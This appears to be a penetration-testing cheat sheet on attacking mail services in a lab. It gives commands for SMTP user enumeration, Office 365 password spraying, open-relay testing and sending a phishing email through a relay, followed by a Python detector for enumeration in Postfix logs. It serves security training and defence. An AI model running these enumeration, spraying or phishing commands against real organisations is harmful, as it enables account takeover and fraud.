MX: Mail eXchanger

| Port | Service |
|---|---|
| TCP/25 | SMTP Unencrypted |
| TCP/143 | IMAP4 Unencrypted |
| TCP/110 | POP3 Unencrypted |
| TCP/465 | SMTP Encrypted |
| TCP/587 | SMTP Encrypted/STARTTLS |
| TCP/993 | IMAP4 Encrypted |
| TCP/995 | POP3 Encrypted |
To automate user enumeration: https://github.com/pentestmonkey/smtp-user-enum
Example:
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
Office 365 information gathering and user enumeration: https://github.com/0xZDH/o365spray
For password spraying:
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. <http://mycustomphishinglink.com/>' --server 10.10.11.213
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.203.12 -v
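What the RCPT-method enumeration above looks like from the mail server's side, as an added detection example that is not part of the original notes. It assumes Postfix-style smtpd reject lines; the sample log, the `find_rcpt_enumeration` name and the threshold of 3 are constructed for illustration.

```python
import re
from collections import defaultdict

# Postfix smtpd rejection for an unknown local recipient (log format is an assumption).
REJECT_RE = re.compile(
    r"reject: RCPT from \S*\[(?P<ip>[0-9a-fA-F.:]+)\]: 55\d [\d.]+ "
    r"<(?P<rcpt>[^>]*)>: Recipient address rejected: User unknown"
)

def find_rcpt_enumeration(log_text, threshold=3):
    """Map each client IP to the distinct unknown recipients it probed,
    keeping only clients that reached `threshold` distinct misses."""
    misses = defaultdict(set)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            # Lower-case so case variants of one mailbox count once.
            misses[m.group("ip")].add(m.group("rcpt").lower())
    return {ip: sorted(r) for ip, r in misses.items() if len(r) >= threshold}

def _reject(ip, rcpt):
    # Builds one constructed log line; host, PID and timestamp are made up.
    return (
        "Mar  3 10:00:01 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from "
        f"unknown[{ip}]: 550 5.1.1 <{rcpt}>: Recipient address rejected: "
        "User unknown in local recipient table; from=<probe@example.test> "
        f"to=<{rcpt}> proto=SMTP helo=<client>"
    )

# Constructed sample: one client walking a user list, one sender with a single typo.
SAMPLE_LOG = "\n".join([
    _reject("10.10.14.5", "admin@inlanefreight.htb"),
    _reject("10.10.14.5", "backup@inlanefreight.htb"),
    _reject("10.10.14.5", "Admin@inlanefreight.htb"),
    _reject("10.10.14.5", "svc-sql@inlanefreight.htb"),
    _reject("192.0.2.44", "jsmiht@inlanefreight.htb"),
    "Mar  3 10:00:09 mx postfix/smtpd[2101]: connect from mail.example.test[192.0.2.44]",
])

if __name__ == "__main__":
    for ip, rcpts in find_rcpt_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(rcpts)} unknown recipients probed: {', '.join(rcpts)}")
```

Counting distinct unknown recipients per client, rather than raw rejects, keeps a retrying sender with one mistyped address below the threshold.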